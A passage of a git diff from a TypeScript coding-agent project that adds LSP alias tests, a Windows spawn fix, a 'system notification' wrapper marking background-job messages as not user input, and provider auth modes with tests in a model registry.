+/** + * When a default server key is renamed (e.g., kotlin-language-server → kotlin-lsp), + * user overrides referencing the old key must still merge correctly via LEGACY_ALIASES. 
+ * + * This test exercises the merge path through loadConfig() with a temp project + * containing an lsp.json that uses the legacy key. + */ + +import { describe, it, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import * as fs from "node:fs"; +import * as path from "node:path"; +import * as os from "node:os"; +import { loadConfig } from "./config.js"; + +describe("LSP legacy server key aliases", () => { + let tmpDir: string; + + beforeEach(() => { + tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "lsp-alias-test-")); + }); + + afterEach(() => { + fs.rmSync(tmpDir, { recursive: true, force: true }); + }); + + it("merges user override with legacy key 'kotlin-language-server' into 'kotlin-lsp'", () => { + // Write an lsp.json that uses the old key name with a command that exists (node) + // so resolveCommand doesn't filter it out. + const overrideConfig = { + servers: { + "kotlin-language-server": { + command: "node", + }, + }, + }; + fs.writeFileSync( + path.join(tmpDir, "lsp.json"), + JSON.stringify(overrideConfig), + ); + + // Also add root markers so the server is detected + fs.writeFileSync(path.join(tmpDir, "build.gradle.kts"), ""); + + const config = loadConfig(tmpDir); + + // The merged config should have kotlin-lsp (new key) with the user's command override + const kotlinServer = config.servers["kotlin-lsp"]; + assert.ok(kotlinServer, "kotlin-lsp should exist in merged config"); + assert.equal( + kotlinServer.command, + "node", + "command should be overridden from user config via legacy alias", + ); + assert.ok( + kotlinServer.fileTypes.includes(".kt"), + "fileTypes should be inherited from defaults", + ); + + // The old key should NOT appear as a separate entry + assert.equal( + config.servers["kotlin-language-server"], + undefined, + "legacy key should not appear as separate server", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/lsp/lspmux.ts b/packages/pi-coding-agent/src/core/lsp/lspmux.ts index 
05ef13b38..6e01d7807 100644 --- a/packages/pi-coding-agent/src/core/lsp/lspmux.ts +++ b/packages/pi-coding-agent/src/core/lsp/lspmux.ts @@ -90,6 +90,9 @@ async function checkServerRunning(binaryPath: string): Promise { try { const proc = spawn(binaryPath, ["status"], { stdio: ["ignore", "pipe", "pipe"], + // On Windows, the binary may be a .cmd wrapper requiring shell + // resolution to avoid ENOENT/EINVAL (#2854). + shell: process.platform === "win32", }); const exited = await Promise.race([ diff --git a/packages/pi-coding-agent/src/core/messages.test.ts b/packages/pi-coding-agent/src/core/messages.test.ts new file mode 100644 index 000000000..6741da93c --- /dev/null +++ b/packages/pi-coding-agent/src/core/messages.test.ts @@ -0,0 +1,114 @@ +/** + * messages.test.ts — Tests for convertToLlm custom message handling. + * + * Reproduction test for #3026: background job completion notifications + * delivered as custom messages must be clearly distinguishable from + * user-typed input when converted to LLM messages. + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { convertToLlm, type CustomMessage } from "./messages.js"; + +/** Extract the first content block from a message, asserting array content. 
*/ +function firstTextBlock(msg: ReturnType[number]) { + const { content } = msg; + assert.ok(Array.isArray(content), "Expected content to be an array"); + const block = content[0]; + assert.ok(typeof block === "object" && block !== null, "Expected first block to be an object"); + return block; +} + +test("convertToLlm wraps custom messages with system notification prefix", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone", + display: true, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + assert.equal(result.length, 1); + assert.equal(result[0].role, "user"); + + // The content must include a system notification wrapper so the LLM + // does not confuse it with user input (#3026). + const text = firstTextBlock(result[0]); + assert.equal(text.type, "text"); + assert.ok( + "text" in text && text.text.includes("[system notification"), + "Custom message should be wrapped with system notification marker", + ); +}); + +test("convertToLlm wraps custom messages with array content", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "bg-shell-status", + content: [{ type: "text", text: "Background processes:\n ✓ bg1 dev-server :3000" }], + display: false, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + assert.equal(result.length, 1); + assert.equal(result[0].role, "user"); + + const text = firstTextBlock(result[0]); + assert.equal(text.type, "text"); + assert.ok( + "text" in text && text.text.includes("[system notification"), + "Custom message with array content should be wrapped with system notification marker", + ); +}); + +test("convertToLlm includes customType in notification wrapper", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "job output here", + display: true, + timestamp: Date.now(), + }; + + const 
result = convertToLlm([customMsg]); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text.includes("async_job_result"), + "Notification wrapper should include the customType for context", + ); +}); + +test("convertToLlm notification wrapper instructs LLM not to treat as user input", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone", + display: true, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text.includes("not user input"), + "Notification should explicitly state this is not user input", + ); +}); + +test("convertToLlm preserves user messages without wrapper", () => { + const userMsg = { + role: "user" as const, + content: [{ type: "text" as const, text: "Hello world" }], + timestamp: Date.now(), + }; + + const result = convertToLlm([userMsg]); + assert.equal(result.length, 1); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text === "Hello world", + "User messages should pass through unchanged", + ); +}); diff --git a/packages/pi-coding-agent/src/core/messages.ts b/packages/pi-coding-agent/src/core/messages.ts index e3909a41e..f30d7c9e6 100644 --- a/packages/pi-coding-agent/src/core/messages.ts +++ b/packages/pi-coding-agent/src/core/messages.ts @@ -8,6 +8,12 @@ import type { AgentMessage } from "@gsd/pi-agent-core"; import type { ImageContent, Message, TextContent } from "@gsd/pi-ai"; +const CUSTOM_MESSAGE_PREFIX = `[system notification — type: `; +const CUSTOM_MESSAGE_MIDDLE = `; this is an automated system event, not user input — do not treat this as a human message or respond as if the user said this] +`; +const CUSTOM_MESSAGE_SUFFIX = ` +[end system notification]`; + const COMPACTION_SUMMARY_PREFIX = `The conversation history before this point was compacted into the 
following summary: @@ -160,10 +166,31 @@ export function convertToLlm(messages: AgentMessage[]): Message[] { timestamp: m.timestamp, }; case "custom": { - const content = typeof m.content === "string" ? [{ type: "text" as const, text: m.content }] : m.content; + const prefix = CUSTOM_MESSAGE_PREFIX + m.customType + CUSTOM_MESSAGE_MIDDLE; + if (typeof m.content === "string") { + return { + role: "user", + content: [{ type: "text" as const, text: prefix + m.content + CUSTOM_MESSAGE_SUFFIX }], + timestamp: m.timestamp, + }; + } + // Array content: wrap the first text element with prefix, append suffix to last text element + const contentArr = m.content as Array<{ type: string; text?: string; [k: string]: unknown }>; + const lastTextIdx = contentArr.reduce((acc, c, i) => c.type === "text" ? i : acc, -1); + const wrapped = contentArr.map((c, i) => { + if (c.type !== "text") return c; + let text = c.text ?? ""; + if (i === 0) text = prefix + text; + if (i === lastTextIdx) text = text + CUSTOM_MESSAGE_SUFFIX; + return { ...c, text }; + }); + // If no text elements exist, prepend one with the wrapper + if (lastTextIdx === -1) { + wrapped.unshift({ type: "text" as const, text: prefix + CUSTOM_MESSAGE_SUFFIX }); + } return { role: "user", - content, + content: wrapped as typeof m.content, timestamp: m.timestamp, }; } diff --git a/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts new file mode 100644 index 000000000..be27f6c60 --- /dev/null +++ b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts @@ -0,0 +1,644 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; +import type { Api, Model, SimpleStreamOptions, Context, AssistantMessageEventStream } from "@gsd/pi-ai"; +import { getApiProvider } from "@gsd/pi-ai"; +import type { AuthStorage } from "./auth-storage.js"; +import { ModelRegistry } from "./model-registry.js"; + +function 
createRegistry(hasAuthFn?: (provider: string) => boolean): ModelRegistry { + const authStorage = { + setFallbackResolver: () => {}, + onCredentialChange: () => {}, + getOAuthProviders: () => [], + get: () => undefined, + hasAuth: hasAuthFn ?? (() => false), + getApiKey: async () => undefined, + } as unknown as AuthStorage; + + return new ModelRegistry(authStorage, undefined); +} + +function createProviderModel(id: string, api?: string): NonNullable[1]["models"]>[number] { + return { + id, + name: id, + api: (api ?? "openai-completions") as Api, + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + }; +} + +function findModel(registry: ModelRegistry, provider: string, id: string): Model | undefined { + return registry.getAvailable().find((m) => m.provider === provider && m.id === id); +} + +function makeModel(provider: string, id: string, api: string): Model { + return { + id, + name: id, + api: api as Api, + provider, + baseUrl: `${provider}:`, + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + }; +} + +function makeContext(): Context { + return { + systemPrompt: "test", + messages: [{ role: "user", content: "hello", timestamp: Date.now() }], + }; +} + +/** No-op streamSimple for tests that need one to pass validation but don't inspect it. 
*/ +const noopStreamSimple = (_model: Model, _context: Context, _options?: SimpleStreamOptions) => { + return { + [Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; }, + result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }), + push: () => {}, + end: () => {}, + } as unknown as AssistantMessageEventStream; +}; + +/** Create a spy streamSimple that captures the options it receives and returns a stub stream. */ +function createStreamSpy(): { + streamSimple: (model: Model, context: Context, options?: SimpleStreamOptions) => AssistantMessageEventStream; + getCapturedOptions: () => SimpleStreamOptions | undefined; +} { + let capturedOptions: SimpleStreamOptions | undefined; + const streamSimple = (_model: Model, _context: Context, options?: SimpleStreamOptions) => { + capturedOptions = options; + // Return a minimal stub that satisfies AssistantMessageEventStream + return { + [Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; }, + result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }), + push: () => {}, + end: () => {}, + } as unknown as AssistantMessageEventStream; + }; + return { streamSimple, getCapturedOptions: () => capturedOptions }; +} + +// ─── Registration ───────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — registration", () => { + it("registers externalCli provider with 
streamSimple and without apiKey/oauth", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.doesNotThrow(() => { + registry.registerProvider("cli-provider", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: spy.streamSimple, + models: [createProviderModel("cli-model")], + }); + }); + }); + + it("registers none provider with streamSimple and without apiKey/oauth", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.doesNotThrow(() => { + registry.registerProvider("none-provider", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: spy.streamSimple, + models: [createProviderModel("local-model")], + }); + }); + }); + + it("rejects apiKey provider without apiKey or oauth — message mentions authMode", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("apikey-provider", { + authMode: "apiKey", + baseUrl: "https://api.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("authMode"), "error message must mention authMode"); + assert.ok(err.message.includes("externalCli"), "error message must suggest externalCli"); + return true; + }); + }); + + it("rejects provider with no authMode and no apiKey/oauth (defaults to apiKey)", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("bare-provider", { + baseUrl: "https://api.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("authMode"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects externalCli provider without streamSimple", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("cli-no-stream", { + authMode: 
"externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple"); + assert.ok(err.message.includes("externalCli"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects none provider without streamSimple", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("none-no-stream", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple"); + assert.ok(err.message.includes("none"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects externalCli provider that also sets apiKey", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.throws(() => { + registry.registerProvider("cli-with-key", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + apiKey: "SHOULD_NOT_EXIST", + streamSimple: spy.streamSimple, + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("apiKey"), "error message must mention apiKey"); + assert.ok(err.message.includes("externalCli"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects none provider that also sets apiKey", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.throws(() => { + registry.registerProvider("none-with-key", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + apiKey: "SHOULD_NOT_EXIST", + streamSimple: spy.streamSimple, + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("apiKey"), "error message 
must mention apiKey"); + assert.ok(err.message.includes("none"), "error message must mention authMode"); + return true; + }); + }); +}); + +// ─── getProviderAuthMode ────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getProviderAuthMode", () => { + it("returns apiKey for unregistered (built-in) providers", () => { + const registry = createRegistry(); + assert.equal(registry.getProviderAuthMode("anthropic"), "apiKey"); + }); + + it("returns explicit authMode when set", () => { + const registry = createRegistry(); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.getProviderAuthMode("cli"), "externalCli"); + }); + + it("returns none when authMode is none", () => { + const registry = createRegistry(); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.getProviderAuthMode("local"), "none"); + }); +}); + +// ─── isProviderRequestReady ─────────────────────────────────────────────────── + +describe("ModelRegistry authMode — isProviderRequestReady", () => { + it("returns true for externalCli without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("cli"), true); + }); + + it("returns true for none without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: 
noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("local"), true); + }); + + it("returns false for apiKey provider without stored auth", () => { + const registry = createRegistry(() => false); + assert.equal(registry.isProviderRequestReady("anthropic"), false); + }); + + it("returns true for apiKey provider with stored auth", () => { + const registry = createRegistry(() => true); + assert.equal(registry.isProviderRequestReady("anthropic"), true); + }); +}); + +// ─── isReady callback ───────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — isReady callback", () => { + it("calls isReady and returns its result for externalCli provider", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli-down", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("cli-down"), false); + }); + + it("calls isReady for apiKey provider (overrides hasAuth)", () => { + const registry = createRegistry(() => true); + registry.registerProvider("strict-provider", { + apiKey: "MY_KEY", + baseUrl: "https://api.local", + api: "openai-completions", + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("strict-provider"), false); + }); + + it("isReady returning true makes provider available", () => { + const registry = createRegistry(() => false); + registry.registerProvider("healthy-cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => true, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("healthy-cli"), true); + }); + + it("falls through to default behavior when isReady not provided", () 
=> { + const registry = createRegistry(() => false); + registry.registerProvider("no-callback", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + // externalCli without isReady → true (default) + assert.equal(registry.isProviderRequestReady("no-callback"), true); + }); +}); + +// ─── getAvailable ───────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getAvailable", () => { + it("includes externalCli models without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("cli-model")], + }); + assert.ok(findModel(registry, "cli", "cli-model")); + }); + + it("includes none models without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("local-model")], + }); + assert.ok(findModel(registry, "local", "local-model")); + }); + + it("excludes externalCli models when isReady returns false", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli-down", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(findModel(registry, "cli-down", "m"), undefined); + }); + + it("excludes apiKey models without stored auth", () => { + const registry = createRegistry(() => false); + const available = registry.getAvailable(); + assert.equal(available.length, 0); + }); +}); + +// ─── getApiKey 
──────────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getApiKey", () => { + it("returns undefined for externalCli provider", async () => { + const registry = createRegistry(); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + const model = registry.getAll().find((m) => m.provider === "cli")!; + assert.equal(await registry.getApiKey(model), undefined); + }); + + it("returns undefined for none provider", async () => { + const registry = createRegistry(); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + const model = registry.getAll().find((m) => m.provider === "local")!; + assert.equal(await registry.getApiKey(model), undefined); + }); + + it("delegates to authStorage for apiKey provider", async () => { + const registry = createRegistry(); + const key = await registry.getApiKeyForProvider("anthropic"); + assert.equal(key, undefined); + }); +}); + +// ─── streamSimple apiKey stripping ──────────────────────────────────────────── + +describe("ModelRegistry authMode — streamSimple apiKey boundary", () => { + it("strips apiKey from options for externalCli provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-strip-${Date.now()}`; + + registry.registerProvider("cli-strip", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-strip", "m", apiType), + makeContext(), + { apiKey: 
"should-be-stripped", maxTokens: 1024 } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist in options for externalCli provider"); + assert.equal(captured.maxTokens, 1024, "other options must pass through"); + }); + + it("strips apiKey from options for none provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `none-strip-${Date.now()}`; + + registry.registerProvider("none-strip", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("none-strip", "m", apiType), + makeContext(), + { apiKey: "should-be-stripped", maxTokens: 2048 } as SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist in options for none provider"); + assert.equal(captured.maxTokens, 2048, "other options must pass through"); + }); + + it("preserves apiKey in options for apiKey provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `apikey-preserve-${Date.now()}`; + + registry.registerProvider("apikey-preserve", { + apiKey: "MY_KEY", + baseUrl: "https://api.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("apikey-preserve", "m", apiType), + makeContext(), + { apiKey: "sk-real-key", maxTokens: 4096 } as 
SimpleStreamOptions, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal(captured.apiKey, "sk-real-key", "apiKey must be preserved for apiKey provider"); + assert.equal(captured.maxTokens, 4096, "other options must pass through"); + }); + + it("handles undefined options for externalCli provider", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-undef-${Date.now()}`; + + registry.registerProvider("cli-undef", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-undef", "m", apiType), + makeContext(), + undefined, + ); + + const captured = spy.getCapturedOptions(); + assert.ok(captured !== undefined, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must not exist even when options is undefined"); + }); + + it("strips apiKey but preserves signal and other fields for externalCli", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + const apiType = `ext-cli-fields-${Date.now()}`; + const abortController = new AbortController(); + + registry.registerProvider("cli-fields", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: apiType as Api, + streamSimple: spy.streamSimple, + models: [createProviderModel("m", apiType)], + }); + + const provider = getApiProvider(apiType as Api); + assert.ok(provider, "provider must be registered in api registry"); + + provider.streamSimple( + makeModel("cli-fields", "m", apiType), + makeContext(), + { apiKey: "strip-me", maxTokens: 8192, signal: abortController.signal, reasoning: "high" } as SimpleStreamOptions, + ); + + const captured = 
spy.getCapturedOptions(); + assert.ok(captured, "streamSimple must have been called"); + assert.equal("apiKey" in captured, false, "apiKey must be stripped"); + assert.equal(captured.maxTokens, 8192, "maxTokens must pass through"); + assert.equal(captured.signal, abortController.signal, "signal must pass through"); + assert.equal((captured as Record).reasoning, "high", "reasoning must pass through"); + }); +}); + +// ─── Provider-scoped stream routing (#2533) ─────────────────────────────────── + +describe("ModelRegistry authMode — provider-scoped stream routing", () => { + it("does not clobber built-in stream handler when custom provider uses same api", () => { + const registry = createRegistry(() => true); + const customSpy = createStreamSpy(); + + // Register a custom provider with the same API type as a built-in (anthropic-messages). + // This simulates the claude-code-cli extension registering with api: "anthropic-messages". + registry.registerProvider("custom-cli", { + authMode: "externalCli", + baseUrl: "local://custom", + api: "anthropic-messages", + streamSimple: customSpy.streamSimple, + models: [createProviderModel("custom-model", "anthropic-messages")], + }); + + // The built-in anthropic-messages provider should still be accessible + // when calling streamSimple with a model from the built-in provider. + const provider = getApiProvider("anthropic-messages" as Api); + assert.ok(provider, "anthropic-messages provider must still be registered"); + + // Call with a built-in anthropic model — should NOT hit the custom spy. + // The built-in handler will throw (no API key), which proves the routing + // correctly delegates to the built-in instead of the custom handler. 
+ assert.throws( + () => provider.streamSimple( + makeModel("anthropic", "claude-sonnet-4-6", "anthropic-messages"), + makeContext(), + { maxTokens: 4096 } as SimpleStreamOptions, + ), + (err: Error) => err.message.includes("API key"), + "built-in Anthropic handler must be invoked (throws because no API key in tests)", + ); + + assert.equal( + customSpy.getCapturedOptions(), + undefined, + "custom provider's streamSimple must NOT be called for anthropic provider models", + ); + }); + + it("routes to custom provider when model.provider matches", () => { + const registry = createRegistry(() => true); + const customSpy = createStreamSpy(); + + registry.registerProvider("custom-cli", { + authMode: "externalCli", + baseUrl: "local://custom", + api: "anthropic-messages", + streamSimple: customSpy.streamSimple, + models: [createProviderModel("custom-model", "anthropic-messages")], + }); + + const provider = getApiProvider("anthropic-messages" as Api); + assert.ok(provider); + + // Call with the custom provider's model — should hit the custom spy + provider.streamSimple( + makeModel("custom-cli", "custom-model", "anthropic-messages"), + makeContext(), + { maxTokens: 2048 } as SimpleStreamOptions, + ); + + const captured = customSpy.getCapturedOptions(); + assert.ok(captured, "custom provider's streamSimple must be called for its own models"); + assert.equal(captured.maxTokens, 2048); + }); +}); diff --git a/packages/pi-coding-agent/src/core/model-registry.ts b/packages/pi-coding-agent/src/core/model-registry.ts index 08766af24..762e459cc 100644 --- a/packages/pi-coding-agent/src/core/model-registry.ts +++ b/packages/pi-coding-agent/src/core/model-registry.ts @@ -4,8 +4,10 @@ import { type Api, + applyCapabilityPatches, type AssistantMessageEventStream, type Context, + getApiProvider, getModels, getProviders, type KnownProvider, @@ -28,6 +30,7 @@ import { ModelDiscoveryCache } from "./discovery-cache.js"; import type { DiscoveredModel, DiscoveryResult } from 
"./model-discovery.js"; import { getDefaultTTL, getDiscoverableProviders, getDiscoveryAdapter } from "./model-discovery.js"; import { clearConfigValueCache, resolveConfigValue, resolveHeaders } from "./resolve-config-value.js"; +import { isLocalModel } from "./local-model-check.js"; const Ajv = (AjvModule as any).default || AjvModule; const ajv = new Ajv(); @@ -128,6 +131,8 @@ ajv.addSchema(ModelsConfigSchema, "ModelsConfig"); type ModelsConfig = Static; +export type ProviderAuthMode = "apiKey" | "oauth" | "externalCli" | "none"; + /** Provider override config (baseUrl, headers, apiKey) without custom models */ interface ProviderOverride { baseUrl?: string; @@ -230,7 +235,7 @@ export class ModelRegistry { constructor( readonly authStorage: AuthStorage, - private modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"), + readonly modelsJsonPath: string | undefined = join(getAgentDir(), "models.json"), ) { this.discoveryCache = new ModelDiscoveryCache(); @@ -243,6 +248,9 @@ export class ModelRegistry { return undefined; }); + // Refresh models when credentials change (e.g., OAuth token refresh with new model limits) + this.authStorage.onCredentialChange(() => this.refresh()); + // Load models this.loadModels(); } @@ -297,7 +305,10 @@ export class ModelRegistry { } } - this.models = combined; + // Apply capability patches so custom/discovered/extension models get + // capabilities (supportsXhigh, supportsServiceTier, etc.) that the + // static pi-ai registry applies at module load for built-in models. + this.models = applyCapabilityPatches(combined); } /** Load built-in models and apply provider/model overrides */ @@ -456,6 +467,18 @@ export class ModelRegistry { this.customProviderApiKeys.set(providerName, providerConfig.apiKey); } + // Register custom providers so isProviderRequestReady() can find + // them (#3531). Without this, models.json providers with apiKey + // fail the auth check and are invisible to the fallback resolver. 
+ if (!this.registeredProviders.has(providerName)) { + this.registeredProviders.set(providerName, { + authMode: providerConfig.apiKey ? "apiKey" : "none", + apiKey: providerConfig.apiKey, + baseUrl: providerConfig.baseUrl, + isReady: providerConfig.apiKey ? () => true : undefined, + } as any); + } + for (const modelDef of modelDefs) { const api = modelDef.api || providerConfig.api; if (!api) continue; @@ -510,7 +533,31 @@ export class ModelRegistry { * This is a fast check that doesn't refresh OAuth tokens. */ getAvailable(): Model[] { - return this.models.filter((m) => this.authStorage.hasAuth(m.provider)); + return this.models.filter((m) => this.isProviderRequestReady(m.provider)); + } + + /** + * Get auth mode for a provider. + * Defaults to "apiKey" for built-ins and providers without explicit mode. + */ + getProviderAuthMode(provider: string): ProviderAuthMode { + const config = this.registeredProviders.get(provider); + if (!config) return "apiKey"; + if (config.authMode) return config.authMode; + if (config.oauth) return "oauth"; + if (config.apiKey) return "apiKey"; + return "apiKey"; + } + + /** + * Whether a provider can be used for requests/fallback without hard auth gating. + */ + isProviderRequestReady(provider: string): boolean { + const config = this.registeredProviders.get(provider); + if (config?.isReady) return config.isReady(); + const authMode = this.getProviderAuthMode(provider); + if (authMode === "externalCli" || authMode === "none") return true; + return this.authStorage.hasAuth(provider); } /** @@ -522,17 +569,23 @@ export class ModelRegistry { /** * Get API key for a model. + * Returns undefined for externalCli/none providers (no key needed). 
* @param sessionId - Optional session ID for sticky credential selection */ async getApiKey(model: Model, sessionId?: string): Promise { - return this.authStorage.getApiKey(model.provider, sessionId); + const authMode = this.getProviderAuthMode(model.provider); + if (authMode === "externalCli" || authMode === "none") return undefined; + return this.authStorage.getApiKey(model.provider, sessionId, { baseUrl: model.baseUrl }); } /** * Get API key for a provider. + * Returns undefined for externalCli/none providers (no key needed). * @param sessionId - Optional session ID for sticky credential selection */ async getApiKeyForProvider(provider: string, sessionId?: string): Promise { + const authMode = this.getProviderAuthMode(provider); + if (authMode === "externalCli" || authMode === "none") return undefined; return this.authStorage.getApiKey(provider, sessionId); } @@ -587,12 +640,49 @@ export class ModelRegistry { if (!config.api) { throw new Error(`Provider ${providerName}: "api" is required when registering streamSimple.`); } - const streamSimple = config.streamSimple; + const rawStreamSimple = config.streamSimple; + const authMode = config.authMode ?? "apiKey"; + + // Keyless providers never see apiKey in options — enforced at registration, + // not by convention. Prevents undefined from reaching any handler. + const streamSimple = (authMode === "externalCli" || authMode === "none") + ? ((model: Model, context: Context, options?: 